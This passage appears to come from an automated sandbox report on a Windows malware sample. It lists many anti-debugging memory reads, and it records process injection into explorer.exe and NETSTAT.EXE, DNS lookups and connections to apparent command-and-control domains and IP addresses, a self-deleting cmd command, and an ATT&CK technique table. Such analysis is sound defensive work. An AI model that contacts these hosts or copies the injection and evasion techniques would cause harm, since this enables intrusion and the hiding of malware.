          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013523E3 mov ecx, dword ptr fs:[00000030h]4_2_013523E3
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013523E3 mov ecx, dword ptr fs:[00000030h]4_2_013523E3
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013523E3 mov eax, dword ptr fs:[00000030h]4_2_013523E3
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013253CA mov eax, dword ptr fs:[00000030h]4_2_013253CA
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013253CA mov eax, dword ptr fs:[00000030h]4_2_013253CA
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E4A2C mov eax, dword ptr fs:[00000030h]4_2_012E4A2C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E4A2C mov eax, dword ptr fs:[00000030h]4_2_012E4A2C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136AA16 mov eax, dword ptr fs:[00000030h]4_2_0136AA16
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136AA16 mov eax, dword ptr fs:[00000030h]4_2_0136AA16
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B8A0A mov eax, dword ptr fs:[00000030h]4_2_012B8A0A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C3A1C mov eax, dword ptr fs:[00000030h]4_2_012C3A1C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A5210 mov eax, dword ptr fs:[00000030h]4_2_012A5210
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A5210 mov ecx, dword ptr fs:[00000030h]4_2_012A5210
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A5210 mov eax, dword ptr fs:[00000030h]4_2_012A5210
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A5210 mov eax, dword ptr fs:[00000030h]4_2_012A5210
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AAA16 mov eax, dword ptr fs:[00000030h]4_2_012AAA16
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AAA16 mov eax, dword ptr fs:[00000030h]4_2_012AAA16
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E927A mov eax, dword ptr fs:[00000030h]4_2_012E927A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135B260 mov eax, dword ptr fs:[00000030h]4_2_0135B260
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135B260 mov eax, dword ptr fs:[00000030h]4_2_0135B260
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378A62 mov eax, dword ptr fs:[00000030h]4_2_01378A62
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136EA55 mov eax, dword ptr fs:[00000030h]4_2_0136EA55
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01334257 mov eax, dword ptr fs:[00000030h]4_2_01334257
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9240 mov eax, dword ptr fs:[00000030h]4_2_012A9240
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9240 mov eax, dword ptr fs:[00000030h]4_2_012A9240
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9240 mov eax, dword ptr fs:[00000030h]4_2_012A9240
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9240 mov eax, dword ptr fs:[00000030h]4_2_012A9240
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BAAB0 mov eax, dword ptr fs:[00000030h]4_2_012BAAB0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BAAB0 mov eax, dword ptr fs:[00000030h]4_2_012BAAB0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DFAB0 mov eax, dword ptr fs:[00000030h]4_2_012DFAB0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DD294 mov eax, dword ptr fs:[00000030h]4_2_012DD294
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DD294 mov eax, dword ptr fs:[00000030h]4_2_012DD294
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2AE4 mov eax, dword ptr fs:[00000030h]4_2_012D2AE4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2ACB mov eax, dword ptr fs:[00000030h]4_2_012D2ACB
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378D34 mov eax, dword ptr fs:[00000030h]4_2_01378D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0132A537 mov eax, dword ptr fs:[00000030h]4_2_0132A537
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136E539 mov eax, dword ptr fs:[00000030h]4_2_0136E539
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4D3B mov eax, dword ptr fs:[00000030h]4_2_012D4D3B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4D3B mov eax, dword ptr fs:[00000030h]4_2_012D4D3B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4D3B mov eax, dword ptr fs:[00000030h]4_2_012D4D3B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AAD30 mov eax, dword ptr fs:[00000030h]4_2_012AAD30
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CC577 mov eax, dword ptr fs:[00000030h]4_2_012CC577
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CC577 mov eax, dword ptr fs:[00000030h]4_2_012CC577
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E3D43 mov eax, dword ptr fs:[00000030h]4_2_012E3D43
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01323540 mov eax, dword ptr fs:[00000030h]4_2_01323540
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01353D40 mov eax, dword ptr fs:[00000030h]4_2_01353D40
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C7D50 mov eax, dword ptr fs:[00000030h]4_2_012C7D50
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D35A1 mov eax, dword ptr fs:[00000030h]4_2_012D35A1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D1DB5 mov eax, dword ptr fs:[00000030h]4_2_012D1DB5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D1DB5 mov eax, dword ptr fs:[00000030h]4_2_012D1DB5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D1DB5 mov eax, dword ptr fs:[00000030h]4_2_012D1DB5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013705AC mov eax, dword ptr fs:[00000030h]4_2_013705AC
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013705AC mov eax, dword ptr fs:[00000030h]4_2_013705AC
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2581 mov eax, dword ptr fs:[00000030h]4_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2581 mov eax, dword ptr fs:[00000030h]4_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2581 mov eax, dword ptr fs:[00000030h]4_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2581 mov eax, dword ptr fs:[00000030h]4_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DFD9B mov eax, dword ptr fs:[00000030h]4_2_012DFD9B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DFD9B mov eax, dword ptr fs:[00000030h]4_2_012DFD9B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01358DF1 mov eax, dword ptr fs:[00000030h]4_2_01358DF1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BD5E0 mov eax, dword ptr fs:[00000030h]4_2_012BD5E0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BD5E0 mov eax, dword ptr fs:[00000030h]4_2_012BD5E0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136FDE2 mov eax, dword ptr fs:[00000030h]4_2_0136FDE2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136FDE2 mov eax, dword ptr fs:[00000030h]4_2_0136FDE2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136FDE2 mov eax, dword ptr fs:[00000030h]4_2_0136FDE2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136FDE2 mov eax, dword ptr fs:[00000030h]4_2_0136FDE2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov ecx, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DBC2C mov eax, dword ptr fs:[00000030h]4_2_012DBC2C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE; Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Code function: 4_2_00409B40 LdrLoadDll,4_2_00409B40

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe; Network Connect: 104.21.60.208 80
          Source: C:\Windows\explorer.exe; Domain query: www.sarahkramirez.store
          Source: C:\Windows\explorer.exe; Domain query: www.taeksanglee.com
          Source: C:\Windows\explorer.exe; Network Connect: 23.225.32.156 80
          Source: C:\Windows\explorer.exe; Domain query: www.stxgvdhndry.mobi
          Source: C:\Windows\explorer.exe; Domain query: www.malmaten.xyz
          Source: C:\Windows\explorer.exe; Network Connect: 99.83.248.72 80
          Source: C:\Windows\explorer.exe; Domain query: www.03gjm.xyz
          Source: C:\Windows\explorer.exe; Network Connect: 203.170.80.250 80
          Source: C:\Windows\explorer.exe; Domain query: www.supertry.online
          Source: C:\Windows\explorer.exe; Domain query: www.ohhhmarketing.com
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: A80000
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Memory written: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Thread register set: target process: 3968
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Thread register set: target process: 3968
          Source: C:\Windows\SysWOW64\NETSTAT.EXE; Thread register set: target process: 3968
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe; Process created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
          Source: C:\Windows\SysWOW64\NETSTAT.EXE; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe"
          Source: explorer.exe, 00000006.00000000.291136563.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.273163507.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.259148017.0000000000688000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000006.00000000.285004794.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.324335948.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.299316370.00000000080ED000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.273354808.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.320890357.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.259419306.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.273354808.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.320890357.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.259419306.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.320686942.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.291147750.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.259167913.000000000069D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000006.00000000.273354808.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.320890357.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.259419306.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\4505682666.exe; Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7

          Stealing of Sensitive Information


          Remote Access Functionality

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Native API | Path Interception | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 612 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 612 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Connections Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
